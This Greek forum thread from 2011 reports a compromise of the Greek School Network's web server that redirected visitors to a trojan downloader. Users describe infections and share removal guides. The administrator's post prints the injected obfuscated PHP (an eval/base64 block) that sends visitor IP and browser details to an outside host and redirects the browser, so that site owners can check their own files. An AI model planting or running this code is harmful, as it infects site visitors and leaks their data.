Παραβίαση ασφαλείας των σελίδων του ΠΣΔ

Ξεκίνησε από alkisg, 14 Απρ 2011, 10:17:03 ΜΜ

« προηγούμενο - επόμενο »

alkisg

Σήμερα για κάποιες ώρες το φόρουμ είχε παραβιαστεί, πιθανώς λόγω κάποιου κενού ασφαλείας του SMF.
Το αποτέλεσμα ήταν ότι σε κάθε επίσκεψη ο χρήστης μεταφερόταν για λίγο σε κάποια άλλη σελίδα που είχε το "TrojanDownloader:Java/Exdoer", και ανάλογα με το λειτουργικό, τον browser και το αντιιικό του υπήρχε περίπτωση να κολλήσει.

Επανέφερα το φόρουμ όπως ήταν πριν την παραβίαση, αλλά δεν έχει ακόμα ανακοινωθεί κάποιο κενό ασφαλείας από την εταιρία Simple Machines που αναπτύσσει το λογισμικό SMF του φόρουμ, ούτε έχει βγει κάποια διόρθωση, επομένως δεν υπάρχει εγγύηση ότι αυτό δεν θα ξανασυμβεί.

Έτσι για τις επόμενες μέρες καλό θα είναι οι χρήστες του φόρουμ να είναι προσεκτικοί κατά την επίσκεψή τους.

poursali

και από ότι είδα ανακαλύφτηκε σήμερα από την microsoft... όσοι νομίζουν ότι έχουν προσβληθεί καλύτερα να περιορίσουν τη χρήση του υπολογιστή μέχρι να έχει ενημερωθεί το αντιικό...
μετρον αριστον
είμαι τζαμπατζής, χρησιμοποιώ λίνουξ

dim

Παράθεση από: alkisg στις 14 Απρ 2011, 10:17:03 ΜΜ
....
Παράθεση από: poursali στις 14 Απρ 2011, 10:32:11 ΜΜ
καλύτερα να περιορίσουν τη χρήση του υπολογιστή
να είναι προσεκτικοί κατά την επίσκεψή τους.
Τι ακριβώς δηλαδή να κάνουμε?
Πως γίνεται το να είμαι προσεκτική κατά την επίσκεψή μου...    και πως γίνεται να περιορίσω τη χρήση...
Υπάρχει κάποιο χαπάκι....... αντιβίωση ίσως?

nikosx

εγώ πάντως κόλλησα πολύ πράγμα και ο desktop έχει σχεδόν πεθάνει :(
Νίκος Ξένος
Καθηγητής Πληροφορικής
nxenos@sch.gr

poursali

μια λύση είναι αυτή: http://www.bleepingcomputer.com/virus-removal/remove-ms-removal-tool

δεν την έχω ελέγξει μιας και έχω λινουξ

@dim: το λέω πχ για κάποιον που κάνει συναλλαγές μέσω ιντερνετ, web banking κλπ και επίσης για όσους δεν θα ήθελαν να χάσουν κάποιο σημαντικό αρχείο - κυρίως τα δεδομένα μας νοιάζουν πάντα
μετρον αριστον
είμαι τζαμπατζής, χρησιμοποιώ λίνουξ

evry

http://www.geekpolice.net/t26522-remove-ms-removal-tool-removal-guide

το παραπάνω το δοκίμασα γιατί κόλλησε ο ένας υπολογιστής και είναι οκ.

με το linux δεν υπάρχει πρόβλημα
What I cannot create I do not understand -- Richard Feynman
http://evripides.mysch.gr

pgrontas

Παράθεση από: poursali στις 14 Απρ 2011, 10:32:11 ΜΜ
και από ότι είδα ανακαλύφτηκε σήμερα από την microsoft... όσοι νομίζουν ότι έχουν προσβληθεί καλύτερα να περιορίσουν τη χρήση του υπολογιστή μέχρι να έχει ενημερωθεί το αντιικό...
Πάντως σε μένα το Microsoft Security Essentials το μπλόκαρε εξαρχής και δεν φαίνεται να έχω κολλήσει τίποτα.
Programs must be written for people to read, and only incidentally for machines to execute - Harold Abelson

poursali

Παράθεση από: pgrontas στις 14 Απρ 2011, 11:43:26 ΜΜ
Πάντως σε μένα το Microsoft Security Essentials το μπλόκαρε εξαρχής και δεν φαίνεται να έχω κολλήσει τίποτα.

ίσως είχε προλάβει το δικό σου να ενημερωθεί :)
μετρον αριστον
είμαι τζαμπατζής, χρησιμοποιώ λίνουξ

petrosp13

Δημιούργησε χοντρό πρόβλημα αυτό που κατέβαινε από την σελίδα, αλλά το επανέφερα σε safe mode
Δεν άφηνε κανένα πρόγραμμα να ανοίξει, δεν άφηνε το CTRL+ALT+DEL, έκλεισε ακόμα και τα υπάρχοντα προγράμματα
Παπαδόπουλος Πέτρος
Καθηγητής Πληροφορικής

tom

Θωμάς Σκυλογιάννης

- Ζήσε σα να' ταν να πεθάνεις αύριο. Μάθε σα να' ταν να ζεις για πάντα.
                                                                                     Μαχάτμα Γκάντι

amichail

Και εμένα το έπιασε το avast antivirus. Αλλά είχε όλο το sch.gr πρόβλημα, δεν έμπαινε ούτε στο webmail ούτε πουθενά. Ούτε και σε πολλές άλλες σελίδες.
Αφού για μια στιγμή σκέφτηκα μήπως ήταν false positive.
Μετά άλλαξα σε Ubuntu, έψαξα ανενόχλητη πλέον στο google και είδα ότι έχει κάνει μεγάλη ζημιά ... άρχισε κατά κύματα και ήταν πλέον σε μορφή χιονοστιβάδας.
Για μένα θα πω μόνο ότι είμαι ο τύπος του δασκάλου που αν κάνω ένα μάθημα για 50η φορά θα αλλάξω για 52η φορά τις σημειώσεις μου

geokra

Παράθεση από: poursali στις 14 Απρ 2011, 10:50:12 ΜΜ
μια λύση είναι αυτή: http://www.bleepingcomputer.com/virus-removal/remove-ms-removal-tool

δεν την έχω ελέγξει μιας και έχω λινουξ

@dim: το λέω πχ για κάποιον που κάνει συναλλαγές μέσω ιντερνετ, web banking κλπ και επίσης για όσους δεν θα ήθελαν να χάσουν κάποιο σημαντικό αρχείο - κυρίως τα δεδομένα μας νοιάζουν πάντα
Και γω το ίδιο κόλλησα, αλλά είναι και λίγο επίμονο το άτιμο, δεν βγαίνει και εύκολα.

Λάμπρος Μπουκουβάλας

εγώ δεν αντιμετώπισα κανένα πρόβλημα.
πρέπει να το παραδεχθείτε, έχω τον καλύτερο και ασφαλέστερο υπολογιστή του κόσμου!  ;D
Λάμπρος Μπουκουβάλας
MSc - MRes

http://blogs.sch.gr/lambrosbouk

Ο Θουκυδίδης  (που τον διαβάζουν οι ξένοι, αλλά όχι εμείς)  έγραφε: «Αταλαίπωρος τοις πολλοίς η ζήτησις της αληθείας, και επί τα ετοίμα μάλλον τρέπονται» (Ι, 20, 3). Οι περισσότεροι δηλαδή αναζητούν αβασάνιστα την αλήθεια και στρέφονται σε ό,τι βρίσκουν έτοιμο. Δεν προβληματίζονται...

alkisg

Χρόνια πολλά σε όλους.

Τελικά το κενό ασφαλείας δεν ήταν στο φόρουμ (SMF) αλλά κάπου πιο κεντρικά στο ΠΣΔ, είτε στον apache, είτε, χειρότερα ακόμα, με τοπική πρόσβαση στο file system του web server. Συγκεκριμένα φαίνεται να προσέβαλε μαζικά πολλούς ιστοχώρους χρηστών του ΠΣΔ, γράφοντας σε όσα αρχεία .php μπορούσε, δηλαδή σε αυτά που είχαν write access στο "others".
Ο trojan έμπαινε στην αρχή αυτών των αρχείων php, με την παρακάτω κρυπτογραφημένη μορφή:
Κώδικας: php
<?php
eval(base64_decode('Z2xvYmFsICRyZXNwb25zZV9zZXNzaW9uczsNCg0KaWYoISRyZXNwb25zZV9zZXNzaW9ucykgew0KCSRyZXNwb25zZV9zZXNzaW9ucyA9ICJhbGl2ZSI7DQoNCgkkcz1iYXNlNjRfZW5jb2RlKHN0cnJldihiYXNlNjRfZW5jb2RlKHN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnUkVNT1RFX0FERFInXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSkpOw0KCSR1PSdodHRwOi8vbWRteXNzZC5jei5jYy94cC9zZXNzaW9uLnBocCc7DQoJJHM9QGZpbGVfZ2V0X2NvbnRlbnRzKCIkdT90PSRzIik7DQoNCglpZihjb3VudCgkaHR0cF9yZXNwb25zZV9oZWFkZXIpKSB7DQoJCSRyZWxvYyA9ICcnOw0KCQlmb3JlYWNoKCRodHRwX3Jlc3BvbnNlX2hlYWRlciBhcyAkdikgew0KCQkJJHQ9ZXhwbG9kZSgiOiAiLCR2KTsNCgkJCWlmKHN0cnRvbG93ZXIodHJpbSgkdFswXSkpPT0ibG9jYXRpb24iKSB7DQoJCQkJJHJlbG9jID0gdHJpbSgkdFsxXSk7DQoJCQl9DQoJCX0NCgkJaWYoJHJlbG9jICYmICFzdHJsZW4oc3RycG9zKCRyZWxvYywnMDAwMDEwMjAnKSkpIHsNCgkJCWlmKCFAaGVhZGVyc19zZW50KCkpIHsNCgkJCQlAaGVhZGVyKCJIVFRQLzEuMSAzMDIgRm91bmQiKTsNCgkJCQlAaGVhZGVyKCJWYXJ5OiBBY2NlcHQtRW5jb2RpbmcsVXNlci1BZ2VudCIpOw0KCQkJCUBoZWFkZXIoIkxvY2F0aW9uOiAkcmVsb2MiKTsNCgkJCX0gZWxzZSB7DQoJCQkJZWNobyAiPGgzPlBhZ2UgTW92ZWQ8L2gzPlRoZSBwYWdlIHlvdSBhcmUgdHJ5aW5nIHRvIG9wZW4gaGFzIGJlZW4gbW92ZWQuPGJyPjxicj5Vc2UgdGhlIG5hdmlnYXRpb24gbGlua3Mgb24gdGhlIHJpZ2h0IG9mIHRoaXMgcGFnZSwgdGhlIHNlYXJjaCBib3ggYXQgdGhlIHRvcCwgb3IgdGhlIHNpdGUgbWFwIGxpbmsgYmVsb3cgdG8gZmluZCB0aGUgbmV3IGxvY2F0aW9uIG9mIHRoZSBwYWdlIHlvdSdyZSBzZWVraW5nLjxicj48YnI+Q2xpY2sgdGhlIGxpbmsgYmVsb3cgdG8gZm9sbG93IG5ldyB1cmwuPGJyPjxicj48YSBocmVmPVwiIi4kdS4iXCI+Ii4kdS4iPC9hPiI7DQoJCQkJZWNobyAic2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj5kb2N1bWVudC5sb2NhdGlvbiA9IFwiIi4kdS4iXCI7PC9zY3JpcHQ+IjsNCgkJCX0NCgkJCWV4aXQ7DQoJCX0NCgl9DQp9'));?><?php και εδώ συνεχίζει το αρχικό αρχείο...


Αν έχετε ιστοχώρο στο ΠΣΔ με php αρχεία, αν θέλετε ρίξτε μια ματιά να δείτε αν κάποια από αυτά τροποποιήθηκαν στις 13/4, κι αν ναι, ελέξτε ότι δεν ξεκινάνε με την παραπάνω γραμμή.

Είχα αναφέρει το πρόβλημα στο helpdesk.sch.gr και τους πρότεινα να κάνουν μια κεντρική ανακοίνωση για να ενημερώσουν όλους τους εκπαιδευτικούς για το πρόβλημα, ώστε τουλάχιστον όσοι κόλλησαν να αφαιρέσουν τον ιό. Σήμερα μου απάντησαν ότι είναι ενήμεροι και έκλεισαν το σχετικό δελτίο.

new2011

Καλησπέρα,
Το web site του Π. Τσιωτάκη βγάζει  το εξής μήνυμα :

Προειδοποίηση- η επίσκεψη σε αυτόν τον ιστότοπο μπορεί να προκαλέσει ζημία στον υπολογιστή σας!

Τι συμβαίνει ????